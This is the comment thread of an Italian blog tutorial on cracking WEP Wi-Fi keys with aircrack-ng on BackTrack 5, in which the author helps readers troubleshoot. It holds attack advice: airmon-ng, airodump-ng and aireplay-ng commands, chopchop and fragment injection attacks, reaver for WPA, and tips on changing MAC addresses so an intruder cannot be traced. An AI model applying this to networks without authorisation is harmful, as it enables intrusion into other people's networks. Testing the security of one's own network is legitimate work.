      In ogni caso i tipi di attacco sono veramente semplici, non hanno bisogno di un tutorial.

      Prova prima l’arpreplay che è quasi lo stesso dell’interactive.

      Se non riesci prova con il fragment e il chopchop. Questi ultimi due però sono un pelino più complessi..

  • Gio

    grazie per l’aiuto:) ti faccio sapere se riesco…

  • Gio

    miracolo! sono riuscito al 100%!!! grazie :)

    • http://mauromarano.it Mauro

      @Gio ottimo :D

  • matteo

    ciao bellissima guida complimenti…
    l’unica cosa che non ho capito la password che ricavo e composta da numeri tipo (11:11:11:11:11) posso usarla direttamente ??
    ciao

    • http://mauromarano.it Mauro

      @Matteo, si basta che togli i due punti tra i numeri ;)

  • Budy

    Ciao Mauro, ottima tutorial grazie. Volelvo sapere se la chiavetta Alfa AWUS036NHA va bene lo stesso che io ho un mac osx lion 10.7.3 se no mi potresti consigliare qualcuna.. Grazie

    • http://mauromarano.it Mauro

      Ciao, guarda purtroppo non ho provato quella chievetta con quel sistema operativo quindi la certezza non te la posso dare :(

  • Giustino Romano

    Ciao Mauro! Scusa se rompo ma quando do il comando airmon-ng start eth1 (la mia è eth1) mi dice:

    Interface Chipset Driver

    eth1 Unknown wl (monitor mode enabled)

    Ma non mi esce la stringa

    (monitor mode enabled on mon0)

    Come mai? Scusa il disturbo!

  • Manuel

    1 Milione e 600 IVs ed aircrack non trova ancora la WEP… tutto cio’ e’ normale? Leggevo nel web che si aggira intorno ai 100mila / 300mila di IVs trovati… e sono con l’alfa mhaaa… potete/puoi aiutarmi? Devo solamente aspettare o cosa? La guida l’ho seguita alla perfezione (tranne quel passo opzionale visto che anche se mi sgamano sono autorizzato a testare la rete), la rete e’ una WEP, il canale e’ esatto uff… troppo tempo quasi 3 ore com’è possibile? Non ci credo ghhhh Grazie!!

  • Manuel

    Mauro sono a quasi 2 milioni di IVs ed il buon aircrack non l’ha trovata… mi potresti consigliare qualche altro tipo di attacco??? (con aireplay) … Quanti pacchetti devo ancora catturare?? ahahaha… E’ una WEP che cavolo… annamo bene…………..x così “poco” gh!!! Se puo’ interessarti ho gli stessi settaggi tuoi: Backtrack 5r2 in virtuale con parallels, alfa (modello tuo), ecc…

  • http://mauromarano.it Mauro

    Ho risposto tante volte a questa domanda :)

    Devi provare un attacco chopchop

  • Manuel

    Mauro ti ringrazio per aver risposto ma il problema era un altro (scusa se ti ho rotto le balls) comunque la scrivo qui che può essere d’aiuto. Ragazzi quando trovate gli IVs non fate partire subito aircrack perchè sempre che lavori dicendo riproverò dopo altri 5000 ivq e così effettivamente fa ma realmente lavora malissimo, era questo il mio problema, potevo continuare fino all’infinito a catturare pacchetti ma aircrack stava funzionando male ed infatti il giorno dopo ho rifatto tutto, ho catturato sui 300 ivs e poi ho aperto aircrack che tempestivamente (roba di secondi) ha trovato la chiave WEP. Ricapitolando confermo quanto detto da te a fine articolo: inserire una wep come protezione equivale a non metterla, anche senza antenna ci mettete molto molto ma molto di piu’ ma arrivati ad un tot di ivs il buon aircrack prima o poi becca la key. Concludo ihihi… sto testando la wpa\wp2 in ricerche\documenti\tutorial\tips\howto\ ecc.. molti dicono che il wpa (di qualsiasi tipo) e’ anche superato però in pratica sto trovando in rete video o dimostrazioni scritte solo con metodo Bruteforce… peccato!!! se sapete qualcosa diffondete altri metodi!!! Tanto mica sono 0day exploit… non possono patchare sono passati al wp2… date al mondo (chi puo’ ihihi) i bug le diciture le vulnerabilità delle wap!!!! Grazie ahahahah:D

    • http://mauromarano.it Mauro

      Manuel non sapevo di questa cosa che hai spiegato. Indagherò per trovare conferma.

      In ogni caso sul sito c’è anche la guida per il crack delle reti wpa. Ma come hai già trovato pure tu l’unico attacco possibile è quello di tipo dizionario, quindi di bruteforcing.

      Non esistono altri metodi ;)

  • Giovanni

    Ciao, volevo dirti che sei un grande. Ho provato con la mia wep e mi da un codice tipo questo AD:4R:0T:LL:6Y, e non so più dove sbattere la testa per capire cosa devo fare. Mi hanno detto in un forum che dovevo scriverlo direttamene ma non mi fa accedere alla rete, nemmeno verifica la pass win e mi dice che è errata :( help

    • http://mauromarano.it Mauro

      La password la devi inserire cosi com’è, senza i due punti.

      Se stai provando sulla tua rete dovresti subito renderti conto se la password è giusta o meno ;)

  • http://www.facebook.com/ vito

    mauro arrivato l adattatore wifi ho assodato che con lion non gira, ho anche backtrack 5 e seguo molto le vostre guide, anche se uso back ma nel mac ho il 10.7 vabene lo stesso? grazie mille ciaoo

  • http://www.mauromarano.it/blog/ indy

    ciao e complimenti
    ma avrei una curiosità:
    sappiamo che è illegale craccare una rete altrui e da altre parti leggo che è pure facile beccare chi la usa a sbafo.
    Su un pc fisso combino qualcosa, proxi o non proxi, collegato a una linea fissa propria sono in teoria rintracciabile e ci sono.
    Ma con un portatile sotto casa mia, se mi craccano e usano la wifi, come si fa a sapere chi è?
    sicuramente posso sapere che la stanno usando e potrò difendermi( o almeno penso)ma come fai a risalire alla persona fisica? magari risali al tipo del portatile e chi l’ha comprato, ma se l’hanno comprato usato a un mercatino…
    bah, ho scritto un poema ma ia domanda è:
    come si fa ( anche la polizia postale) a associare un portatile alla persona?
    scusa il disturbo e grazie
    ciao

  • Mauro

    Ciao indy, se uno viene con un portatile sotto casa tua e cambia il suo mac adress è impossibile rintracciarlo. Lo si potrebbe rintracciare solo se tu fai una denuncia e magari viene ripreso da qualche telecamera ( anche se poi bisogna dimostrare che era lui ad essere connesso alla TUA rete wifi).

    Io parlo spesso di sicurezza perchè lasciare la propria rete wifi libera o protetta con password deboli è una cosa sbagliatissima. Sapessi quanti criminali ci sono che utilizzano le reti wifi per mandare email…Ogni volta che si lascia una rete wifi sprotetta potrebbe essere usata da un killer per ricevere la commissione di qualche mafioso…

    E’ una cosa importantissima proteggere il proprio wifi. Andrebbe fatta una legge a posta per impedire le password wep..

  • Pingback: Denuncia pubblica ad un copione! | Mauro's Page

  • Pingback: [TUTORIAL ITA] Crack di una rete wifi con protezione WPA con AirCrack-ng su backtrack 5 | Mauro's Page

  • tolik

    Scusa l’ignoranza ma e per forza necessaria la chiavetta wifi…non posso usare il modem wifi di casa???

    • maurospage

      No, mi dispiace

  • MRLuca

    Ciao e complimenti per la chiarezza!!
    Avrei 2 domande riguardo il cambio di mac address:
    1) dopo averlo cambiato con macchanger o altro e’ possibile rimettere il precedente? Se si, bisogna farlo a mano ricordandosi il mac address originale oppure dopo un logout si rimette il mac adress oriignale in automatico? (questo perche a lavoro ho registrato il mio e cambiarlo e’ una seccatura)
    2) il mas adress che cambio nel tuo esempio e’ quello della chiavetta di rete, non della mia scheda fisica del mio mac vero? Quindi nel caso di dispositivi esterni, pure se risalgono al mac adress originale non c’e’ modo di risalire alla persona oppure c’e'? Intendo dire che se uno una scheda di rete esterna ed indentifica il mac adress non c’e’ modo di sapere chi la possiede, ma solo dove e’ stata prodotta o al max venduta. Solo nel caso uso ethernet o la mia scheda del mac si puo’ risalire ad un nominativo?
    Grazie mille e compliemnti ancora!!!

    • MRLuca

      Altra domanda (ultima spero): usando virtual box, e connettendomi alla wifii con firefox o ethernet tramite backtrack su virtual box il mac adress e’ sempre quello del dispositivo hardwer usato (quindi lo stesso se mi connetto dal mio mac direttamente) oppure ne viene generato uno nuovo per virtual box? questo perche se faccio ifconfig trovo anche:
      vboxnet0: flags=8843 mtu 1500
      ether 0a:00:27:00:00:00
      inet 192.168.56.1 netmask 0xffffff00 broadcast 192.168.56.255
      che non so a chi attribuire.
      Grazie e scusa per la grammatica che mi sono appena accorto lascia molto a desiderare;)

      • maurospage

        1) Se hai letto bene il tutorial ti sarai accorto che noi cambiamo il mac adress dell’interfaccia VIRTUALE. Questo significa che basta distruggere questa interfaccia, come spiegato nel tutorial, e sei a posto.

        2)Come detto sopra si, si cambia il mac adress dell’interfaccia virtuale creata a partire da un dispositivo usb. Conoscendo il mac adress di una chiavetta possono sapere tutto sulla chiavetta in questione.

        3) In virtual box puoi decidere tu, nelle preferenze, se utilizzare una connessione condivisa, e quindi condividere l’ip della macchina principale, oppure creare una nuova connessione ed utilizzare quindi un nuovo ip.

        ciao ;)

  • Marco

    Ciao Mauro, perche’ quando cerco la mia wifi vodafone non me la trova e mi trova invece altre wifi e sotto la voce BSSID mi dice non associato e sotto la voce ESSID non c’e’ niente?
    Grazie in anticipo,
    Marco

  • Federico

    Ciao Mauro complimenti per la guida molto chiara ed esaustiva volevo solo farti una domanda:e possibile che la mia sceda di rete non supporti il packet inecjon dato che lancio l attacco ,vengo visualizzato dall ap ma non ne ricevo l ack quindi e non cè l associazione
    grazie in anticipo

    • maurospage

      Ciao Federico, si potrebbe essere.

  • http://www.facebook.com/claudioil.gallixsoso Claudio Il Gallixsoso

    Grazie per la bella guida. Tutto andato a buon fine. Key found.

    Scrivi che dovrebbe uscire sia la chiave in hex che in ascii…a me esce solo la prima come faccio a decodificarla? perchè è quella in asci che devo inserire se ad esempio voglio usarla su un windows…o c’è modo di usare direttamente la chiave hex?

    • maurospage

      Dipende dal tipo di router. Ci sono alcuni router che accettano anche password in hex. Ci sono addirittura alcuni router che accettano SOLO hex.

      In ogni caso puoi convertire hex in ascii. Ci sono diversi tool online che fanno questa conversione. Il primo che ho trovato: http://www.dolcevie.com/js/converter.html

  • Ego

    Ciao Mauro, senti, ho intenzione di testare la mia rete con backtrack, ma è necessario che scarichi un dizionario? Se si quale consigli e come faccio ad installarlo su backtrack?

    • maurospage

      Ciao, per provare a crackare una rete wep non è necessario un dizionario. Puoi provare senza seguendo questa guida ;)

  • Ego

    Ciao Mauro, mi servirebbe il tuo aiuto se possibile, ti chiedo per favore di utilizzare dei termini semplici dato che non sono espertissimo (nel caso mi rispondessi).

    Allora: usando backtrack 5 per testare la mia rete WEP riscontro un errore che non so come superare, ho cercato ovunque su internet ma non ho capito nulla, sto cercando di porre rimedio a ciò da ieri ma non ci sono riuscito.

    Seguo la tua videoguida passo passo, ma arrivato al momento di mandare l’invio dopo aver scritto ” airodump-ng –encrypt wep mon0 “, dopo che piggio invio, mi esce fuori questa dicitura:

    ioctl(SIOCSIFFLAGS) failed: No such file or directory.

    Non so come riuscire a superare questa cosa, non so se devo creare una directory, come la devo creare e dove, non so come devo fare, non ho trovato alcuna risposta, ti prego dammi una mano.

    Un saluto.

    • maurospage

      Stai usando una chiavetta usb esterna?

      • Ego

        Sisi, una digicom

        • maurospage

          Hai messo la chiavetta in monitor mode? E’ un problema legato alla chiavetta. O non è messa in monitor mode, o non viene ben riconosciuta. Potrebbe anche essere un problema di driver

          • Ego

            Penso di averla messa in monitore mode tramite il comando ” airmon-ng start wlan0 ” fatto sta che sotto c’è scritto appunto che è attivo come mon0, il passaggio successivo è quello che mi da problemi, cioè dicendo che non c’è nessun file o directory. Non so davvero come fare

          • Ego

            Sisi penso di si perche, come nella guida, digito il comando “airmon-ng start wlan0″ e mi dice che è in monitor mode con il nome mon0
            Nel passaggio successivo però non riesco ad andare avanti, non so davvero come fare!!!

          • Ego

            Mauro, ho risolto cambiato chiavetta, adesso va tutto ok, mi sono però bloccato su un altro punto, cioe qui :
            aireplay-ng -1 0 -a 00:28:25:C6:33:6R mon0

            Faccio invio e dice solo ” sending Authentication Request” e lo ripete per 10 volte circa per poi essere uscitoo ” attack was unsuccessful” Come mai? premetto che per me il canale non era 1 bensi 3. Ho provato a sostituirlo nel codice in vee di mettere “-1″ ho messo “-3″ ma nulla, mi dice addirittura se voglio aiuto, non mi esce nello sending authentication request (open system) comr poddo fare? dove sbaglio?

          • maurospage

            Guarda probabilmente sei troppo vicino o troppo lontano dal router. Prova a muoverti un po’.

  • Ego

    Mauro, ho risolto cambiato chiavetta, adesso va tutto ok, mi sono però bloccato su un altro punto, cioe qui :
    aireplay-ng -1 0 -a 00:28:25:C6:33:6R mon0

    Faccio invio e dice solo ” sending Authentication Request” e lo ripete per 10 volte circa per poi essere uscitoo ” attack was unsuccessful” Come mai? premetto che per me il canale non era 1 bensi 3. Ho provato a sostituirlo nel codice in vee di mettere “-1″ ho messo “-3″ ma nulla, mi dice addirittura se voglio aiuto, non mi esce nello sending authentication request (open system) comr poddo fare? dove sbaglio

  • Ego

    Mauro un ultima cosa ahaha: ho mandato il scansione i pacchetti, ma sono passati 40 minuti e ha scansionato 16.000 pacchetti ma non mi arriva la domanda ” use this packet? ”
    Quanto tempo ci metterà?

    • maurospage

      Quella domanda dovrebbe essere fatta entro pochi secondi. Se non ti viene fatta interrompi e ri-lancia il comando. Puoi bloccare il tutto premendo CTRL + C.

      Se non ti viene fatta nemmeno cosi la domanda devi cambiare attacco.

      • Ego

        Non so che tipo di attacco fare, ho provato il chopchop ma ha nello 1164 packets senza che si presentasse alcuna domanda, son passati 5 minuti… consigli?

        • maurospage

          Prova l’attacco fragment

          • Ego

            Provato ma nulla, nel senso: mi esce la domanda ” use this packets?” metto “y” ma va invano e genera altri pacchetti e mi ripone la domanda, faccio di nuovo “y” ma stessa storia… insomma.. non c’è verso..

  • Davide

    vorrei connettermi senza avvalermi di una chiavetta ho la scheda di rete Atheros ar 9285 vado a dare come comando iwconfig e non mi trova nessuna estensione wireless perche?? ho aggiornato i driver ed ho backtrack 5 r3 aiutatemi plssss

    • maurospage

      Devi avere una chiavetta esterna.

      • Davide

        esistono altri programmi o metodi avvalendomi della scheda di rete del mio pc? o in qualsivoglia metodo è necessaria la presenza di una chiavetta esterna?

        • maurospage

          E’ necessaria una chiavetta esterna.

  • Ego

    Inoltre se vado su Applications-internet-wicd network manager
    affinchè possa connettermi a internet, quando vado su disconnect all non mi rileva nessuna rete wifi, ma qui dove sono io ce ne sono minimo 4 o 5, infatti windows me ne rileva… come posso fare? premetto che ho provato a testare la wep e i driver sono installati e mi trova tutto. Ma sto pensando che sia anche per questo che non riesca a finire bene il test wep. Aiutami ti prego…

  • Power

    Ciao Mauro,
    ho provato più volte, ma anche dopo 20.000 ivs nn trovo la pass… La mia key non supporta injection, è indispensabile ?
    Sul router noto che c’è traffico comunque, infatti a 20000 ci arrivo in 25 minuti. Mi dai una dritta? Grazie

    • maurospage

      Ciao, l’injection non è indispensabile. Ma di certo facilita le cose.

      A volte potresti anche aver bisogno di MILIONI di ivs, quindi una cifra ben più alta di 20k che hai raccolto tu. L’unica cosa che posso dirti è di aspettare ancora e far crescere il numero di ivs raccolti.

      • Power

        Gentilissimo, quindi milioni… Aspetterò o mi comprerò la key che hai tu…
        Grazie 1000
        Per il wpa2 solo bruteforce, giusto?

        • maurospage

          Si, solo bruteforce. Oppure anche reaver se la rete lo supporta: http://code.google.com/p/reaver-wps/wiki/README

          • Power

            La calma è la virtù dei forti!!! A 900.000 beccata…
            Mi ha restituito un valore A0:B1:c2:xx:31:ef:2a:1d:8e:cd:d1:af:xx
            Ma come lo codifico in ASCII(le xx le ho messe per delicatezza) ? Ci ho provato con i converger ma nulla…

          • maurospage

            Hai fatto bene a non scriverla in chiaro. Prova semplicemente a rimuovere i “:” dalla stringa. ad esempio A0B1c2xx31ef2a1d8ecdd1afxx

            !

  • Ffiolo

    CIao mauro, ho installato backtrack, ma da iwconfig non trovo nessuna scheda di rete. Ho provato sia con un atheros che con un intel.. Mi dai qualche consiglio? grazie amigos

  • Luca

    come faccio a inserire un file che ho sul desktop di windows sul desktop di backtrack?